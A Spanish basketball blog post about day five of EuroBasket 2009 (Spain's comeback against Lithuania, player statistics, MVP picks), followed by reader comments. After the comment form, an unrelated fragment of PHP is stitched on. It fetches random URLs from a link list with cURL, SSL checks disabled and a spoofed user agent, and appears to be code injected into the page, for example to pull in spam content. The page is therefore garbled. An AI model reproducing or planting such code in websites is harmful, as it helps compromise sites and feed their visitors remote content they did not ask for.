EuroNBAsket: Jornada 5

15 de September de 2009 por TheDeerHunter

La selección española reaccionó ayer después de 4 horripilantes partidos… y lo hizo precísamente contra Lituania, cuya derrota en el último partido de la preparación (quién sería el iluminado que se le ocurrió poner esa encerrona en ese momento) había sido la génesis de todas las penurias de este comienzo de campeonato. No fue nada fácil a pesar de que estábamos ante la peor Lituania desde su independencia, prácticamente eliminados habiendo perdido todos y cada uno de los choques, alguno de la forma más dolorosa y humillante posible. Sin embargo, en seguida se notó la sobremotivación con la que juegan todos contra los españoles, recordando por momentos al acertado equipo que nos apalizó en Vilnius.

En el caos más absoluto, tanto ofensivo como defensivo y con una desventa de 19-10 tras el primer cuarto muchos equipos en la situación de España hubieran terminado de romperse. Sin embargo, los todavía llamados “chicos de oro” decidieron poner la situación patas arriba con una inédita presión en toda la cancha y un contragolpe vertiginoso que nada tenía que ver con el posicional sin sentido que habíamos visto hasta entonces. Un parcial de nada menos que 23-0 que no recordaban ni los más viejos del lugar permitió respirar al equipo tan machacado anímicamente y se pudo controlar el partido hasta el final.

El mejor por España, el de casi siempre, Pau Gasol con 19-8 y 3 tapones en 24 minutos de juego, volviendo a recordar por momentos al campeón angelino que vimos en junio. Rudy Fernandez estuvo en todos lados con únicamente 11 puntos pero 3 robos, 3 asistencias, 2 rebotes e incluso un tapón, defendiendo además con inteligencia a los rocosos aleros lituanos. Por último Marc Gasol, sin terminar de recuperar la confianza, cuajó un buen partido.

El miércoles España se la juega contra Polonia, que todavía no ha conocido la victoria en toda la fase y que ayer recibió una buena paliza de la mano de los eslovenos. Marcin Gortat, quien había sido quizás el mejor center hasta la fecha, firmó un partido pésimo en el tiro (2 de 10) aunque estuvo bien en el rebote y la defensa. Por contra Primoz Brezec aportó sus 6 canastas de 7 intentos para contribuir a la sangría de puntos que permitieron los polacos. Erazen Lorbek fue el mejor con un impresionante registro de 20 puntos, 9 rebotes, 5 asistencias y un tapón.

En el último partido del grupo los turcos disfrutaron nuevamente de su afortunado momento, manteniendo su imbatibilidad en la prórroga contra los serbios. Ilyasova estuvo sencillamente soberbio y algunos ya piden el MVP del campeonato para él. Por contra Turkoglu muestra un estado de forma preocupante… aunque ya sabemos que en su caso ese tipo de actuaciones apáticas no son más que el preludio de alguna genialidad. Por su parte, Krstic estuvo gris con un 11-7 y 2 de 7 en tiros.

También permanecen imbatidos los franceses en la otra parte del cuadro gracias a la victoria de ayer frente Croacia. Tony Parker es otro de los llamados al MVP y lo demostró con 24 puntos, 6 rebotes y 6 asistencias. Nicolas Batum mostró esta vez el lado bueno de su irregularidad con 18-5 y 2 tapones (qué bonito duelo sería contra Rudy), lo mismo que Boris Diaw. Turiaf, sin embargo, en esta ocasión se lo tomó con calma jugando únicamente 11 minutos. Ukic en su línea… missing in combat.

En los otros dos partidos sin representantes NBA, Rusia sorprendió a Grecia (¿¿??¿¿) y Macedonia a Alemania.

MVP: Tendría que estar entre Parker e Ilyasova pero nos decidimos por el turco porque  lo tenía más difícil en un partido complicado contra los serbios. Respondió con 22 puntos, 11 rebotes, 2 tapones y un robo, con un gran acierto desde la línea de 3. El Barça le echará de menos el curso próximo.

La sorpresa: Que Batum haga dos partidos buenos seguidos…

La decepción: No sabemos si es el segundo apellido de “nuestro idolatrado” Roko Lenni-Ukic… Cuanto más decisivo es el partido más intrascendentemente juega él.

El mayor esfuerzo en vano: El de Turkoglu, que se esforzó por fallar todas y cada una de la ristra de zapatillazos que se tiró el crack. Lanzó el doble que el que más lanzó de sus compañeros… En concreto 12 mandarinas como 12 soles. Se equivocó y acertó en una ocasión. Lástima.

Comenta

8 comentarios a esta entrada

  1. couxe dice:
    #1

    Buff… Cuánto echaba de menos la presión en toda la cancha que ayer volvimos a hacer durante unos cuantos minutos… y cuánto añoro el ver a Pepu en la banda…

    A ver si tras el partido de ayer, Scariolo se da cuenta de que este equipo está hecho para correr, y para defender a toda la cancha siempre que el físico nos lo permita…

      Citar

  2. toni dice:
    #2

    Que gran parcial de españa, si es lo nuestro, defender toda la pista y correr. Muy bien Pau ayer cojiendo el mando y Marc sigue jugando a flashes. Felipe en su linea, que bueno es.
    Que grande ayer Erazem Lorbek, el culé se comio con patatas a Gortat. Aunque lo malo es que ahora si no gana españa a casita.
    Creo que Turiaf está descansando para cuando llegue lo serio, ¿soy yo o francia va muy sobrada?
    En fin, que no le den el mvl a Ilyasova este año que ya tiene adjudicado el del año que viene…

      Citar

  3. Txusma dice:
    #3

    Si se gana bien a Polonia confirmando la recuperacion de sensaciones del partido frente a Lituania volvere a mostrarme a optimistas. Con este equipo en buena forma no hay rival inalcanzable y menos los de este europeo.
    Francia lo que tiene es un fisico brutal. Dificil mantenerle el ritmo todo el partido.

      Citar

  4. KIki dice:
    #4

    Hay que ganar a Polonia xD…. Que miedo el Gortat (jamás pensé que iba a decir esto pero es así), a ver si le mantenemos a raya desde el principio porque tendremos mucho ganado…
    Como empecemos espesitos, puede estar complicado, pero vamos a confiar en los nuestros, y en Scariolo… Para mí la sombra de Calderón es demasiado grande, pero aun así creo que podemos ganar el oro.

      Citar

  5. Óscar dice:
    #5

    Hay que ganar como sea, sin pensar en el próximo rival, seguramente Francia ( vaya partidito sería).
    ¿Polonia? La clave debe ser imponerse en la zona. Tienen una de las rotaciones más cortas de todo el Eurobasket. Marcin Gortat (35 minutos por encuentro, el que más juega de todo el torneo), David Logan, Lampe, Ignerski, Koszarek, Szubarga, además de Roszyk y Chylinski. Están ya bastante maduritos a estas alturas…
    No es mal equipo, pero debemos ganar bien. Cuidado con el amigo Logan, que nos hizo daño en el amistoso previo al torneo. ¿Por qué tengo miedo? Uyyy !!

      Citar

  6. couxe dice:
    #6

    Yo a una de las cosas a las que más miedo tengo es a la respuesta de nuestros jugadores ante el arbitraje, sobre todo en el caso de que el partido se vuelva lento y con mucho ataque estático…
    Sabemos que los árbitros van a ser caseros (arbitraje de manual cuando juega el organizador un partido decisivo), es decir, a ellos debajo del aro no les van a pitar nada, así que espero que los nuestros se conciencien de eso, y no caigan en las protestas continuas, ya que a la mínima van a pitar técnica… Lo digo especialmente por Reyes, y también por Marc, que últimamente está demasiado protestón…

    Por lo demás, si jugamos de forma intensa durante todo el partido y conseguimos correr un poco, ellos no deberían tener demasiadas opciones…

      Citar

  7. TheDeerHunter dice:
    #7

    Estoy seriamente preocupado. Tradicionalmente no nos ha ido excesivamente bien en este tipo de choques trascendentales contra el equipo de casa. Todavía me sale el ardor de estómago recordando algún célebre partido en Grecia o en Turquía… Sólo en 4 de los 36 Europeos que se han jugado el anfitrión ha quedado fuera de los cuartos… así que ojito.

    Una de las claves de las que no se ha hablado mucho es que parece que los árbitros han marcado de alguna forma a los españoles por su manera de forzar faltas. Ya habíamos observado en los últimos campeonatos que los árbitros se habían mostrado visualmente molestos con ciertos gestos de los nuestros, e incluso nos han costado unas cuantas técnicas y amenazas por ese motivo en poco tiempo.
    Al final ya no hay amenazas ni técnicas por exagerar los gestos. No pitan ni una y punto. El nivel físico con el que se están empleando en este campeonato, aumentado por la incapacidad de meter los tiros libres, es algo increíble. No había visto tanta estopa desde los Playoffs de la NBA (que ha llegado a ser algo que roza lo delictivo) y desde luego para mí no tiene precedente en ninguna competición FIBA que haya visto.

    Por suerte, el último partido contra Lituania, los españoles se dejaron de pamplinadas y se dedicaron a repartir tanto como el rival. En este caso los árbitros, al menos fueron coherentes y dejaron jugar a los nuestros tan agresivamente como a nuestros rivales. Eso representó media victoria (o más)

    Lo que me temo es que hoy sólo permitan estopa a favor de unos… y que los nuestros se cieguen en nervios y protestas sin sentido. Nos espera una auténtica encerrona… no tiene demasiado sentido ahora hablar de Francia, Grecia o quien nos echen. Ya habrá tiempo si acaso…

      Citar

  8. Óscar dice:
    #8

    ESPAÑA-FRANCIA. Qué partido.
    El arsenal de Francia es para que compremos pañales, tanto los que están como los que faltan. Es el equipo con mucho de más calidad física del Eurobasket. Repasemos lo que puede elegir Vincent Collet:

    * BASES/ ESCOLTAS: T.Parker, A.Diot, A.Jeanneu, Y.Bokolo, N.De Colo.
    **Ausentes: Y.Gomis, R.Beaubois, A. Rigaudeau, Mickaël Piétrus (!!), M.Sonko, Damien Wilkins (puede jugar con Francia).

    * ALEROS: N.Batum, B.Diaw, Florent Piétrus.
    **Ausentes: M.Gelabale, Y.Diawara.

    * PIVOTS: A.Koffi, A.Traore, R.Turiaf, I.Mahinmi.
    **Ausentes: A.Ajinça, J.Moïso, F.Weis, J.Petro, Joakim Noah (puede jugar con Francia), B.Fofana (del 89).

    Hasta aquí, 26 jugadores. Juegan o han jugado en la NBA: Parker, M.Piétrus, D.Wilkins, Batum, Gelabale, Diawara, Diaw, Turiaf, Mahinmi, Ajinça, Petro y Noah (son 12, ó 10 si no queremos contar a Noah y Wilkins). Están cerca de hacerlo: De Colo, Beaubois. Cuidado con Diot. Francia es el equipo con más jugadores NBA (5) del torneo.
    Pero es que hay más. Han estado en la selección o han sido preseleccionados otros jugadores interesantes como M’Baye, Marquis, Vaty, Moerman, Larrouquis, M.Diarra, Curti, Issa, Pellin o el mismo L.Foirest, que ha jugado algún partido el último año con los “bleus”. Y se retiró (eso sí) Tariq Abdul-Wahad, jeje.
    Pues eso, a comprar dodotis, palomitas, cervecita y a disfrutar, que el PARTIDO es para eso. Pena que no se pueda comprar también algún amigo o novia que de verdad sepa o le guste el baloncesto…jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>